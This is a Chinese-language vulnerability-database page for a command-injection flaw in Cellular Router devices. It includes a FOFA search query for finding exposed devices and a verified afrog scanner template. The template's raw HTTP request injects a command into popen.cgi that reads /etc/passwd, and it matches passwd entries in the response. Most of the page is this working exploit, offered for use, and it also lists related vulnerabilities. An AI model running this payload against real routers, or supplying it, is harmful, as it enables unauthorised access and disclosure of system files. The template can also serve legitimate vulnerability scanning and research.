cellular-router-rce: Cellular Router命令执行漏洞

日期: 2025-09-01 | 影响软件: Cellular Router | POC: 已公开

漏洞描述

移动路由器（Cellular Router）是一种利用移动网络提供无线互联网连接的设备。它们类似于传统路由器，但不同于使用有线连接（如以太网或DSL），它们利用移动数据网络来建立互联网连接。Cellular Router存在命令执行漏洞，攻击者通过在受攻击系统上执行恶意命令，从而获取未授权的系统访问权限。 FOFA: title="index" && header="lighttpd/1.4.30"

PoC代码[已公开]

id: cellular-router-rce

info:
  name: Cellular Router命令执行漏洞
  author: fgz
  severity: critical
  verified: true
  description: |
    移动路由器（Cellular Router）是一种利用移动网络提供无线互联网连接的设备。它们类似于传统路由器，但不同于使用有线连接（如以太网或DSL），它们利用移动数据网络来建立互联网连接。Cellular Router存在命令执行漏洞，攻击者通过在受攻击系统上执行恶意命令，从而获取未授权的系统访问权限。
    FOFA: title="index" && header="lighttpd/1.4.30"
  tags: rce
  created: 2023/09/14

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |
        GET /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/passwd&v=0.1303033443137912 HTTP/1.1
        Host: {{hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Te: trailers
        Connection: close
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

万户OA freemarkeService 远程命令执行漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC

万户OA freemarkeService 远程命令执行漏洞无POC